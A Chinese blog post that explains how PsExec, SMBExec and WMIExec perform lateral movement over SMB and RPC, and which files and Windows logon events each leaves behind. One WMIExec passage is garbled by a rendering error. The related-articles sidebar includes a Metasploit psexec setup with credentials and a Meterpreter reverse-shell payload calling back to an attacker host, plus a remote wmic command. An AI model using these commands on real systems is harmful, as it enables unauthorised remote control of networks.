横向渗透之PSExec、SMBExec和WMIExec的使用及特征

已于 2023-12-09 20:21:39 修改
阅读量2k 收藏 20
点赞数 26
分类专栏: 域渗透 文章标签: 网络安全 安全
于 2023-12-09 20:20:16 首次发布
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/weixin_65550121/article/details/134899961
版权

在这里插入图片描述

PSEXEC

攻击者通过PSEXEC连接到远程机器并通过命名管道执行命令,命名管道是通过一个随机命名的二进制文件创建的,这个文件被写入到远程机器上的ADMIN$共享,最后通过SVCManager用来创建服务。

实际上,这一步相当于运行下列命令:’

sc create [serviceName] binPath= "C:\Windows\[uploaded-binary].exe"

一旦建立了命名管道,我们与远程机器之间的所有命令的输入和输出都将通过SMB协议(445/TCP)进行通信。

命名管道

管道:管道是一个共享内存块,可用于通信和数据交换。管道是一个有两端的对象,一个进程向管道写入信息,另一个进程从管道读取信息。创建管道的进程称为管道服务端(只能在本地创建),连接管道的进程称为管道客户端。

特点:

基于 smb 协议通信,用于在两个进程之间传输数据,包括本地进程和远程进程,其客户端既可以接收数据也可以发送数据,服务器端也是可以接收数据,又可以发送数据。支持单向、双向通信。可以被任意符合权限要求的进程访问,

命名管道可以由 CreateNamedPipeA 创建,接着客户端连接,然后实现读写操作

为什么要使用命名管道来建立网络通信呢?

因为他走的是smb协议,也是tcp的一种。在Windows中,当尝试绑定一个tcp socket端口建立通信时,defender防火墙会警报,需要用户确认放行才可以,这没有高权限不就直接寄了。而命名管道利用了未加密的smb协议(445端口),在Windows中,通常是默认允许smb协议出入站的,所以命名管道经常被使用来绕过防火墙

那么我们来看看是不是我们所说的那样。

首先我们通过PSEXEC去横向的时候,这里上传了一个文件名字叫SBxFixsS.exe的文件,也就是说将这个文件写入到了远程机器的ADMIN$共享中,我们可以查看一下共享目录。
在这里插入图片描述
可以看到这个目录已经有文件了。
在这里插入图片描述

这时候将二进制文件写入到ADMIN$共享之后,SVCManager通过这个文件创建一个回连我们机器的命名管道。

如下图:
在这里插入图片描述

在这里插入图片描述
那么我们来看看系统都会产生什么样的日志。可以看到在安全这里会产生特殊登录 登录日志。
在这里插入图片描述
但是如果我们将PSEXEC窗口关闭的时候,比如 CTRL + C,那么他就会产生注销的日志。
在这里插入图片描述
但是如果我们将PSEXEC窗口关闭的时候,比如 CTRL + C,那么他就会产生注销的日志。
在这里插入图片描述

可以发现如果使用CTRL +C 在结束掉PSEXEC进程之后并不会将文件删除.
在这里插入图片描述
但是如果我们使用exit,文件就会被删除.
在这里插入图片描述

SMBEXEC

SMBEXEC和PSEXEC是差不多的,但是SMBEXEC不会将二进制文件保存到磁盘上,相反,SMBEXEC会利用一个批处理文件,以及一个临时文件,来执行和转发消息,就像PSEXEC一样,SMBExec也是通过SMB协议来发送消息输入信息并接收输出结果的。

接下来我们来看看SMBEXEC的原理。
在这里插入图片描述
建立连接之后,我们执行notepad.exe,可以发现它卡在这了,这因为我们在等待远程机器的输入,然而它永远不会输入。我们打开进程资源管理器查看,这里使用Process Explorer。
在这里插入图片描述
可以看到,Notepad.exe进程是CMD.exe的子进程,如果我们将鼠标悬停在CMD.exe上,可以看到它正在处理存储在C:\Windows\TEMP\execute.bat中数据。那好,下面就让我们快速读取这个文件中存储的数据。
在这里插入图片描述
在读取execute.bat文件中的数据后,我们就会发现,原来发送给远程机器的输入被追加到了文件的开头处。

这个批处理文件本质作用就是把我们的输入发送到远程机器上,执行它们,并把输出重定向到一个名为__output的临时文件中,该文件位于\127.0.0.1\C$路径中。

那么我们来看下日志:
在这里插入图片描述

WMIEXEC

WMIEXEC相比前两个是截然不同的,它是通过135端口与远程RPC建立初始通信来访问远程机器,初始通信建立后,它会使用一个大于1024的随机端口进行协商。

该连接用于向远程机器发送输入。并且,输入的内容将在CMD.EXE进程中执行,输出的内容将保存在远程机器上ADMINKaTeX parse error: Expected group after '_' at position 16: 共享的临时文件中。通过查找以“_̲_”开头的文件名,我们可以很容…共享中找到这个临时文件。两个下划线后面的数值看似随机,但实际上是当前日期和时间转换而成的时间戳。

下面,让我们仔细看看这里到底发生了什么。同样,为了便于分析,让我们请求远程机器启动一个Notepad.exe的实例。我们会发现,执行这个命令会导致WMIExec被挂起。
在这里插入图片描述
正如我们所看到的(用紫色高亮显示的部分),我们发送的输入是在CMD.exe进程中执行的。我们还可以发现,命令的输出将被重定向到位于ADMIN$共享中的临时文件中。

在进程内的线程完成任务后,该进程被终止,而输出则被写入临时文件中。然后,存储在临时文件内的输出将通过SMB发回我们的机器上。

可以看到临时文件。
在这里插入图片描述
WMIEXEC生成的日志:
在这里插入图片描述

0x30sec
关注
  • 26
    点赞
  • 20
    收藏
    觉得还不错? 一键收藏
  • 1
    评论
专栏目录
内网横向移动之:PSExec 与 WMI
f_carey的博客
11-14 1460
郑重声明: 本笔记编写目的只用于安全知识提升,并与更多人共享安全知识,切勿使用笔记中的技术进行违法活动,利用笔记中的技术造成的后果与作者本人无关。倡导维护网络安全人人有责,共同维护网络文明和谐。 PSExec PSExec 原理: 通过管道在远程目标主机上创建一个 PSExec 服务,并在本地磁盘中生成一个名为 PSEXESVC 的二进制文件,然后通过 PSExec 服务运行命令,结束后删除服务。 1 Windows 下 PSExec 使用 PSExec 下载地址 利用注意点: 需要远程系统开启.
横向移动检测之远程执行(一)PsExec
qq_27828281的博客
09-18 4428
横向移动——PsExec远程执行分析及溯源
内网横移之WMIexec
Canterlot的博客
09-04 3162
本文详细介绍了WMIexec的运行原理及特点,命令执行过程,相关工具用法等
SMB工具横向移动
Y22Lee的博客
05-28 413
2013年的Defcon上,就引入了smbexec,后续 smbexec 被 Impacket 进一步完善了。在Impacket中支持明文认证,NTLM认证,Aeskey认证等方式!
**探索WMIexec:潜行于网络中的无声执行者**
最新发布
gitblog_00048的博客
06-10 343
探索WMIexec:潜行于网络中的无声执行者 项目地址:https://gitcode.com/WKL-Sec/WMIExec 在网络安全与远程管理的舞台上,有一款工具正以其独特的魅力,吸引了众多安全研究人员和技术爱好者的目光——WMIexec。本篇文章将深入剖析这款开源项目,揭示其背后的技术实力,探讨应用场景,并展现它独一无二的特点。 项目介绍 WMIexec 是一套基于Python编写的脚本集...
内网渗透-【横向移动】PsExec工具远程命令执行横向移动
lza20001103的博客
04-15 1036
内网渗透-【横向移动】PsExec工具远程命令执行横向移动
Windows远程执行进程工具psexecwmiexec介绍
测试开发小记
05-08 3485
在自动化测试或者自动化工具开发中,通常需要向其它电脑或者服务器发送指令,比如Windows发送命令到Linux服务器开启某个服务进程,或者读取状态信息,我们可以使用ssh协议实现。如果Windows主机需要发送命令到局域网内的其它Windows电脑要如何实现呢?在网络安全中称为横向移动的内网渗透方法可实现远程执行命令,横向移动工具有很多,本文介绍psexecwmiexec这两个工具如何实现远程执行进程。
Windows 远程控制之 PsExec
一直被模仿,从未被超越
01-12 1930
PsExec 是一种轻量级 telnet 替代品,可让你在其他系统上执行进程,并为控制台应用程序提供完整交互性,而无需手动安装客户端软件。PsExec 最强大的用途包括在远程系统上启动交互式命令提示符,以及 IpConfig 等远程启用工具,否则无法显示有关远程系统的信息。远程打开 cmd 命令。
psexec实现控制多台电脑的cmd
lilien的博客
06-23 948
psexec实现控制多台电脑的cmd
使用System权限运行应用程序工具PsExec
01-03
解压后大小128KB的程序...本人用此来解决在VISTA下由于使用UE而导致的花屏或者蓝屏0x00000018问题,详细解决方案参考本人xchuu的163里面的blog, 地址:http://xchuu.blog.163.com/blog/static/2020791120100310495384/
PSTools及使用说明
11-11
PSTools是由微软开发的一套命令行工具...通过正确使用PsExec和其他PSTools组件,你可以更有效地管理和维护网络环境,同时提高日常运维的效率。记住,安全始终是第一位,确保在执行任何操作前充分理解其可能带来的影响。
使用Powershell在多线程中运行PSexec
04-07
除了Powershell和PsExec,还可以使用其他工具进行多服务器管理,比如Windows Server Management Framework的`Invoke-Command` cmdlet,它可以使用WinRM服务在远程主机上执行命令,或者使用PowerShell Direct(在相同...
PsExec64.zip
07-04
....使用PsExec64.exe提升cmd权限 1. 将PsExec64复制到服务器 2. 运行cmd命令: PsExec64.exe /s cmd 如果不成功,则执行下条命令 PsExec64.exe \\127.0.0.1 -u 服务器用户名 -p 服务器密码 /s cmd
Psexec使用方式
bring_coco的博客
07-18 4422
Psexec使用方式
横向渗透PsExec工具使用
qq_46258964的博客
04-16 3715
psexec(微软官方工具)可以躲避检测无视杀毒软件,直接system权限 PsExec是一个轻量级的telnet替代品,它允许您在其他系统上执行进程, 并为控制台应用程序提供完整的交互性,而无需手动安装客户端软件。 PsExec的基本原理是: 通过管道在远程目标机器上创建一个psexec服务, 并在本地磁盘中生成一个名为PSEXESVC的二进制文件, 然后通过psexec服务运行命令,运行结束后删除任务。 利用条件 445端口开放, 知道目标账号密码 PsExec下载地址 优点:可以躲避检测无视杀毒软件
psexec
qq_44881113的博客
09-14 3934
psexec 是 windows 下非常好的一款远程命令行工具。psexec使用不需要对方主机开方3389端口,只需要对方开启admin$共享 (该共享默认开启)。但是,假如目标主机开启了防火墙,psexec也是不能使用的,会提示找不到网络路径。由于psexec是Windows提供的工具,所以杀毒软件将其列在白名单中。但是PsExec在内网中大杀四方后,很多安全厂商开始将PsExec加入了黑名单 下载地址:https://docs.microsoft.com/zh-cn/sysinternals/dow.
WMI使用学习笔记
crowsec
10-21 3884
本文大量参考了师傅们的文章,感谢各位师傅的帮助! WMI的全名为"Windows Management Instrumentation"。 从win98开始,Windows操作系统都支持WMI,WMI可以在本地或者远程管理计算机系统。比如:重启,关机,关闭进程,创建进程等。
WMIC使用
good good study
11-15 5636
远程创建进程 如下,以administrator用户连接192.168.52.140,并在机器上创建一个进程执行ipconfig命令,将结果写入c:\result.txt文本文件中:(由于wmic执行远程命令没有回显,所以要将结果写入到txt中) wmic /node:192.168.52.140 /user:administrator /password:123.com process call create "cmd.exe /c ipconfig > c:\result.txt...
一文解读,网络安全行业人才需求情况《网络安全产业人才发展报告》
weixin_59086772的博客
10-18 8346
随着近几天国家网络安全宣传周在全国各地开展活动,网络安全再一次成为热门话题。网络安全不再缩在小小的安全圈子里,惠及面越来越广。不少对网络安全颇有兴趣的朋友非常关心行业前景如何?该怎么提升自我能力,更快地加入网安行列。 今天雨笋君就10月13日在网络安全宣传周上发布的《2021网络安全人才报告》进行一个简单的行业前景分析。 一、网络安全行业市场发展情况 网络时代生活越来越离不开网络,与此同时发生的网络安全攻击事件、非法入侵等等一系列事件都威胁着普通人的生活。没有网络安全保障,个人和企业等重.
msf的exploit/windows/smb/psexec模块使用
05-23
msf的exploit/windows/smb/psexec模块是一种基于SMB协议的远程执行漏洞利用模块,可以用于尝试利用目标机器上的Windows系统漏洞,并在远程执行的过程中获得对目标机器的控制权限。使用该模块需要先设置相关参数,包括目标机器的IP地址、用户名、密码、要执行的命令等等,然后使用run命令启动攻击。 下面是一个使用msf的exploit/windows/smb/psexec模块的示例: 1. 设置目标机器IP地址、用户名、密码等参数: ``` set RHOST 192.168.1.100 set SMBUser Administrator set SMBPass Password123 ``` 2. 设置要执行的命令: ``` set PAYLOAD windows/meterpreter/reverse_tcp set LHOST 192.168.1.101 set ExitOnSession false ``` 3. 启动攻击: ``` run ``` 这样就会尝试利用目标机器上的Windows系统漏洞,并在远程执行的过程中获得对目标机器的控制权限。在成功执行攻击之后,可以使用Meterpreter控制台进行后续操作,比如查看目标机器的文件、进程等信息,或者执行其他的攻击操作。
评论 1
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值